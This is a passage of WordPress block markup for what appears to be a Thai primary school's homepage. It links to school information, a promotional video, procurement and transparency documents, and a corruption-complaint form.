{\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 